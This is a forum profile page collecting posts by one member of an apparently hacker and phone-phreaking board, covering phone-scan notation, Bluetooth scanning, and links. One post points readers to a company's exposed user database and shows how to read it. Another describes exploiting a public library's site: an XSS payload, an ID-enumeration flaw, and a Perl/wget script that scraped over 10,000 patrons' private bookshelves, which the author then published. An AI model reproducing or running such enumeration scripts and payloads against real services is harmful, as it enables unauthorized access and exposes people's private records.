dual

Agents of the Revolution
  • Content count

    1,196
  • Joined

  • Last visited

Everything posted by dual

  1. Besides an international airport, the mall turned out to be a good spot for the first real test of ghettotooth.pl... Scanning ... 00:60:57:59:58:3F n/a Scanning ... 00:60:57:59:58:3F n/a Scanning ... 00:60:57:51:E1:2B n/a Scanning ... 00:60:57:51:E1:2B n/a Scanning ... 00:60:57:7C:53:BE EmPuLSe Scanning ... 00:60:57:7C:53:BE n/a Scanning ... 00:60:57:43:8A:BC Nokia3650 Scanning ... 00:60:57:43:8A:BC Nokia3650 Scanning ... 00:60:57:43:8A:BC Nokia3650 Scanning ... 00:60:57:43:8A:BC n/a Scanning ... 00:60:57:42:B4:2E n/a Scanning ... 00:60:57:42:B4:2E n/a Scanning ... 00:60:57:42:B4:2E n/a Scanning ... 00:60:57:42:B4:2E n/a Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 n/a Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 00:60:57:45:3A:92 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 00:60:57:45:3A:92 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 00:60:57:45:3A:92 Nokia3650 Scanning ... 00:60:57:40:8A:87 Nokia3650 00:60:57:45:3A:92 Nokia3650 Scanning ... 00:60:57:40:8A:87 n/a 00:60:57:45:3A:92 n/a
  2. Haven't seen it posted, so here ya go... http://www.usdoj.gov/ag/trainingmanual.htm
  3. Was handed this at the London 2600 meeting and scanned it to PDF. The hacker who handed it out was looking for a volunteer to demonstrate his disguise techniques. There weren't any takers before we left, though he may have found one after a few more rounds of pints. Cheers! http://dualisanoob.com/london2600_disguise.pdf And huge thanks to lattera for getting me my account back!
  4. Busted.
  5. Bell's Mind Markup Language (BM2L) is the shorthand method to describe common occurrences in scanning. It's a proposed standard and community input is imperative. Here's the current list: CBCAD - Cannot Be Completed As Dialed CBCAE - Cannot Be Completed As Entered CBRYCA - Cannot Be Reached from Your Calling Area DISCO - Disconnected DTMF - Dual Tone Multi Frequency tones NAYCA - Not Available from Your Calling Area NIS - Not In Service SIT - Special Information Tone TTY - Teletypewriter tones VM - Voice Mail Please provide input for additions, subtractions or changes. I have two right now: - I think we should add 'HELO - Hello?' when the called party answers in a standard fashion - I don't think we should add 'RO - Ring Out' as RO is not recognizable, nor is there context to make it such Edit: Make that three: - I believe scan entries should be in the format 'NPA-NXX-XXXX - DESCRIPTION'. This provides the full number for search tools like grep and provides standardization for entry into databases.
  6. If you call Qwest to cancel your landline service, they'll offer 50% off your bill for four months in honor of the economic downturn. I assume it doesn't include long distance. Sounds like Qwest is hemorrhaging subscribers. Probably should call to "cancel" your service anyway. Editorial: Hey, Qwest. Want to keep subscribers? Don't send a disconnect notice the first month of service if payment is a few days late. Especially when the customer's cell provider is much more casual about mistakes and *gasp* always gets paid. Next, quit trying to upsell every time a subscriber calls. Multiple times per call. You're so desperate for a date, you're driving people away. Third, market your landline service in a logical, non-fear inducing fashion: As a low priced, reliable communications service for the place where people spend most of their time, their home, where 911 is most effective, which works when the power's out, and is easy to subscribe to and pay for. Of course, you'd actually have to lower the price and make is easy to subscribe. Say from $13 to $7 to bring final bills from $20 to $15, and have the web sign up actually work. Yeah. I can't imagine why you can't keep subscribers. Making a "dead" technology more deader and all.
  7. Couple of new scans up at http://www.scanaday.net/. Send your fresh scans to handscanaday at gmail dot com.
  8. This should help. http://www.stromcarlson.com/misc/4ess.txt
  9. 16/20. I obviously didn't view source.
  10. From Boing Boing, dig this. http://www.boingboing.net/2009/04/24/boing...g-video-wa.html
  11. Edit: Get the song here instead. http://beemp3.com/download.php?file=189864...song=war+dialer
  12. Name the scan as normal, 20090329_325-235-05xx.scan.txt. Add updates by uploading the same file.
  13. Forty meg wordlist. Not real big. It should do. http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
  14. Scan it out. http://www.handscan.net/
  15. Check your DNS and/or use OpenDNS, and watching the connection with Wireshark is a great idea. Have you tried getting to Google using a proxy? Please let us know what you find.
  16. It's an inductive loop: http://auto.howstuffworks.com/question234.htm
  17. International numbers are most welcome. As are mp3s. Name them 20090131_555-555-1212.scan.mp3 I'll PM you some creds, Beave, so you can upload.
  18. Just put up three days worth of scans. Thanks to Rpm and Kayara!
  19. http://www.gwmarketingservices.com/_data/users.mdb strings users.mdb | grep -v "]" | less
  20. http://www.handscan.net Generate your scan list then just Ctrl+A and middle click or Ctrl+C, Ctrl+V into your favorite text editor and scan away. More features forthcoming.
  21. Sorry about that. I need to add an override or remove some of the error checking. Edit: I removed the 959 NXX error check and will handle any others on a case-by-case basis.
  22. Jeez, I don't know what took me so long. With the wonders of pre, it now outputs text with the trailing space. And it's still valid. Please let me know if anything doesn't work as it should.
  23. So, yeah, sorry, no moonshine or malware here. This post details a bit about my local library's online bookshelf system. I love my local library. You can check out books, movies, music and more at any branch and return them to any branch. You can search for and reserve items online. They have a secure RSS feed for checked in and due date alerts. Plus, they have an online bookshelf, called My Bookshelf, that stores favorited items. Each account's My Bookshelf comes with the Default bookshelf. You can then create additional, user-named bookshelves. In a bookshelf you can add and delete items, and choose whether or not to make the bookshelf publicly viewable. To get the quick stuff out of the way, I learned that the bookshelf name is vulnerable to XSS. Here you can see HTML rendering. What you can't see is the bookshelf named... </li></ul></div>a<script language="JavaScript" type="text/javascript">history.go(-1);</script> (Thanks, Evil1!) There are some other oddities regarding bookshelf names that I won't go into here. Every user created bookshelf gets it's own unique ID, i.e. mybookshelf.jsp?id=XXXXX. Authenticate and put that in the URL bar and you get somebody else's bookshelf. I don't believe you can see other default bookshelves without authenticating as that user. Just unique bookshelves given an ID number. Though you can view bookshelves marked private, which is the default. You can also delete items from another's bookshelf. Not good. Here's somebody's bookshelf. Algorithms? I'm terrible at music. Given this, I poked around with ID ranges and found that 3000 to 22000 seemed to bound accounts. I wrote a Perl script that used wget's header capability to send the session ID after I authenticated. It accepts four and five-digit IDs, of which I used the latter for sorting. #!/usr/bin/perl -w use strict; my @array = (3000..22000); for my $scalar(@array) { my $id = sprintf("%05d", $scalar); system("wget --no-cookies --header \"Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\" http://www.publiclibrary.org/mybookshelf.jsp?id=$id"); sleep 1; } I ran it for about 24 hours and got just over 18,000 files. I removed the empty bookshelves and had over 10,000 left. I then looked at source for the strings I needed to get what I wanted, namely, names and titles. These lines seemed to do it. <input type="hidden" name="mbkshelf" value="NAME" alt=""> <div class="recordListTitle"><a href="controller.jsp?R=XXXXXXXXXX">TITLE</a> </div> Another Perl script and we get a nice readable file with bookshelf names and associated titles. #!/usr/bin/perl -w use strict; my $name; my %hash; my @files = glob "my*"; foreach my $file(@files) { open FILE, '<', $file or die; while (<FILE>) { if (/hidden" name="mbkshelf" value="(.+?)"/) { $name = $1; $hash{$name} = [ ]; } if (/recordListTitle"><.+>(.+?)<\/a>/) { push @{ $hash{$name} }, $1; } } } foreach my $key (sort { lc($a) cmp lc($b) } keys %hash) { print "Name:\n"; print "\t$key\n\n"; print "Titles:\n"; foreach my $val ( @{ $hash{$key} } ) { print "\t$val\n"; } print "\n********************************************************************************\n\n"; } I left out autoviv for my clarity and the resulting file is over 3.5 MB raw, 1 MB gzipped. http://dualisanoob.com/mybookshelf/mybookshelf.txt Some names are authors, a few are patrons, and one or two are library card numbers. I simply find it fascinating to see what other people are consuming, thinking. Yes, I put two and two together and didn't want to go any further. As I said, I love my library. Though it would be a good exercise...
  24. Upload seems to work. [2009-01-12 20:00] [success] 20090111_412-562-00xx.scan.txt [2009-01-12 20:00] [success] 20090112_937-222-98xx.scan.txt What issues were there? Edit: I noticed that your CGIProxy needs SSL support to access scanaday.net. Any other issues, let me know.
  25. Absolutely, an added description for errors and VM is essential. I added it to the standard. I also added DATU, quiet term and more example numbers. I improved the writing and formatting as well. I was thinking of adding a "pitfalls" section - fast busy vs. reorder, ring out instead of RO, use of HELO and "unknown" - to help users. What do you think? Thanks to everybody for the input. I'm just now starting to implement all of the great suggestions and already the improvement is immense. It's the community's now and it's awesome. http://dualisanoob.com/phreak/articles/bm2l.pdf